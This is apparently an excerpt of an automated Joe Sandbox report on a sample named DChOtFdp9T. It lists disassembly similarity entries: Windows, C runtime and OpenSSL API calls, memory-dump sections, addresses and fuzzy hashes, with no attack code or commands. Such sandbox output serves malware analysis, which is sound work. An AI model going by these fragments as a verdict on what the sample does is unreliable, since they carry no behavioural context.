                                                                                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2780335769-0
                                                                                                                                                                                                                            • Opcode ID: bc17293da209965c32b68d9e01c100981e0df9d73fb9666d34f13de776241312
                                                                                                                                                                                                                            • Instruction ID: 7f5c91999750d50c4934fd7ca13de7cf3835f22f201a04d27d49890afc744921
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc17293da209965c32b68d9e01c100981e0df9d73fb9666d34f13de776241312
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12517C22E087818AFB50DF76D4513BD2BA1BF88B5CF30A135DE499768ADFB8D4518381
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1279662727-0
                                                                                                                                                                                                                            • Opcode ID: 0008bce29e6a7ea5a7bea1dab7c6bfd996e360174adfa5d32bd81f8338427ad4
                                                                                                                                                                                                                            • Instruction ID: 350b7baf356bd5904bfc1c9687715fd033cad1a8c964c6157f6dabe69d21c040
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0008bce29e6a7ea5a7bea1dab7c6bfd996e360174adfa5d32bd81f8338427ad4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB419522D1878183E7508B62D5503797AA0FF95768F20A334E65C87AD2DFFCA5E08780
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3251591375-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00007FFE0073E160: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FFE0076B3D9,?,?,00000000,00007FFE0076F2D3,?,?,?,?,00007FFE0076F264), ref: 00007FFE0073E1A7
                                                                                                                                                                                                                            • InitializeCriticalSectionAndSpinCount.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00000000,00007FFE00734DF6), ref: 00007FFE0076D321
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877342060.00007FFE00731000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFE00730000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877321758.00007FFE00730000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877476367.00007FFE007DC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877524588.00007FFE00814000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877547774.00007FFE00817000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe00730000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocCountCriticalHeapInitializeSectionSpin
                                                                                                                                                                                                                            • String ID: InitializeCriticalSectionEx
                                                                                                                                                                                                                            • API String ID: 2225649465-3084827643
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6029A4899), ref: 00007FF6029A49B7
                                                                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6029A4899), ref: 00007FF6029A49CD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1707611234-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,00007FF6029A9855,?,?,00000000,00007FF6029A990A), ref: 00007FF6029A9A46
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6029A9855,?,?,00000000,00007FF6029A990A), ref: 00007FF6029A9A50
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 918212764-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FFE0076B3D9,?,?,00000000,00007FFE0076F2D3,?,?,?,?,00007FFE0076F264), ref: 00007FFE0073E1A7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877342060.00007FFE00731000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFE00730000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe00730000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877342060.00007FFE00731000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFE00730000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe00730000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3168844106-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FFE00735A8D
                                                                                                                                                                                                                              • Part of subcall function 00007FFE00734DA0: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FFE00734DCC
                                                                                                                                                                                                                              • Part of subcall function 00007FFE00734DA0: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FFE00734E21
                                                                                                                                                                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FFE00735AB3
                                                                                                                                                                                                                              • Part of subcall function 00007FFE00734E48: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FFE00734E68
                                                                                                                                                                                                                              • Part of subcall function 00007FFE00734EA4: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FFE00734F00
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877342060.00007FFE00731000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFE00730000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe00730000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave$HandleInfoStartup
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 425825594-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _fread_nolock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 840049012-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00007FF602998410: MultiByteToWideChar.KERNEL32(?,?,?,00007FF602993F84,00000000,00007FF602991925), ref: 00007FF602998449
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00007FF602995BE6,?,00007FF60299308E), ref: 00007FF602998112
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2592636585-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,?,00007FF60299FD00,?,?,?,00007FF6029A136A,?,?,?,?,?,00007FF6029A2B59), ref: 00007FF6029AC4BA
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ERR_new.LIBCRYPTO-3(?,?,00000000,00000000,00000000,00007FFDFF260119), ref: 00007FFDFF266062
                                                                                                                                                                                                                            • ERR_set_debug.LIBCRYPTO-3(?,?,00000000,00000000,00000000,00007FFDFF260119), ref: 00007FFDFF26607A
                                                                                                                                                                                                                            • ERR_set_error.LIBCRYPTO-3(?,?,00000000,00000000,00000000,00007FFDFF260119), ref: 00007FFDFF26608C
                                                                                                                                                                                                                            • ERR_new.LIBCRYPTO-3(?,?,00000000,00000000,00000000,00007FFDFF260119), ref: 00007FFDFF2660BC
                                                                                                                                                                                                                            • ERR_set_debug.LIBCRYPTO-3(?,?,00000000,00000000,00000000,00007FFDFF260119), ref: 00007FFDFF2660D4
                                                                                                                                                                                                                            • ERR_set_error.LIBCRYPTO-3(?,?,00000000,00000000,00000000,00007FFDFF260119), ref: 00007FFDFF2660E6
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$dane_tlsa_add
                                                                                                                                                                                                                            • API String ID: 1552677711-3143159635
                                                                                                                                                                                                                            • Opcode ID: 551c87e53307f0464cbc915bc00dac611a03fa4d0804b3cb6043db781686e7c8
                                                                                                                                                                                                                            • Instruction ID: d798c6c135dc446d93c6e4c5f504ca3561af2a09600f316f98218e783267e8e6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 551c87e53307f0464cbc915bc00dac611a03fa4d0804b3cb6043db781686e7c8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B026C21F0D69246FB14A715E461EF99760AF81750F808235DE7DCB6EEEE3CE9458B00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: L_sk_new_nullL_sk_pop_freeR_newR_set_debugX509X509_freeX509_new_exd2i_
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_srvr.c$tls_process_client_certificate
                                                                                                                                                                                                                            • API String ID: 3085087540-2403068147
                                                                                                                                                                                                                            • Opcode ID: 96cccb673fb7a0223120be839b847c22047223b73bf956a95570213e9be3475c
                                                                                                                                                                                                                            • Instruction ID: 4975c51eaaf877ecf5a826403bbade88fb16c0b250547931e4618fbb15580f23
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96cccb673fb7a0223120be839b847c22047223b73bf956a95570213e9be3475c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F127A61B09A8289FB14DB65D460AFD6760EB85B84F844236EE7DC76DEEE3CE540C700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: X_free$O_free$R_free$C_freeX_new$C_fetchC_finalC_initDecryptInit_exM_construct_endM_construct_utf8_stringN1_item_freeO_mallocO_memcmpR_clear_errorR_fetchR_newR_set_debugR_set_errorX_get_iv_lengthX_get_mac_sizememcpy
                                                                                                                                                                                                                            • String ID: ..\s\ssl\t1_lib.c$AES-256-CBC$HMAC$SHA256$digest
                                                                                                                                                                                                                            • API String ID: 3158562322-2842977263
                                                                                                                                                                                                                            • Opcode ID: ccd50790312f35070ea952bdfd1c7acd9846867f6810b18f743ffe61a52793a0
                                                                                                                                                                                                                            • Instruction ID: cf8a8fa76e7f9c925a7692bbafd1c54314448f0f579dd9c639a18829a9f2eed4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ccd50790312f35070ea952bdfd1c7acd9846867f6810b18f743ffe61a52793a0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B612D322B0964286EB149B15E570ABD63A0EF45B94F440275DEBEC77EDEF3CE4418B00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_free$L_sk_free$D_freeD_get0_providerL_sk_pop_free$E_free$D_lock_freeH_freeO_free_ex_dataO_secure_freeR_freeR_get0_providerX509_
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                            • API String ID: 234229340-1080266419
                                                                                                                                                                                                                            • Opcode ID: 4b639082856fd045cf4de6375e292c89bffd49d48b8e2fd70d68950a295ae69d
                                                                                                                                                                                                                            • Instruction ID: 3994d6740ce367e16acf5b02aa28901f3da9902aa4159c0dfb45e3abe63276ef
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b639082856fd045cf4de6375e292c89bffd49d48b8e2fd70d68950a295ae69d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4914461B1964284EB04AF22D470BF86711EF85B88F881232DE7DDB7DEEE2DE5458710
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_new$R_set_debug$L_cleanse$O_freememcpy$D_get0_nameD_is_aD_read_lockD_unlockH_retrieveO_strndup_time64
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
                                                                                                                                                                                                                            • API String ID: 1519632984-3130753023
                                                                                                                                                                                                                            • Opcode ID: 8cb13298c3e0d310e5cc157dcbe769d251cfafbec6efaec0c4de0f4a02495d03
                                                                                                                                                                                                                            • Instruction ID: 490384832a1c86557c8d24b87f641460a239771ad0164e4786e38f0dbcbe6a18
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8cb13298c3e0d310e5cc157dcbe769d251cfafbec6efaec0c4de0f4a02495d03
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA12D462B0D68245F7249B65D460ABDA7A0EF81788F404232DEBDC77DEEE7CE5419700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$L_sk_pop_free$D_freeL_sk_new_nullL_sk_pushX509_d2i_
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_srvr.c$tls_parse_ctos_status_request
                                                                                                                                                                                                                            • API String ID: 1108277277-3579644669
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$X509_get0_pubkeyX_new_from_pkey
                                                                                                                                                                                                                            • String ID: $..\s\ssl\statem\statem_clnt.c$tls_construct_cke_gost
                                                                                                                                                                                                                            • API String ID: 3869628303-1144584530
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$X_free
                                                                                                                                                                                                                            • String ID: $ $..\s\ssl\statem\statem_srvr.c$tls_process_cke_gost18
                                                                                                                                                                                                                            • API String ID: 1470995052-4050591057
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$D_bytes_exD_get_size
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
                                                                                                                                                                                                                            • API String ID: 2724910838-1194634662
                                                                                                                                                                                                                            Memory Dump Source
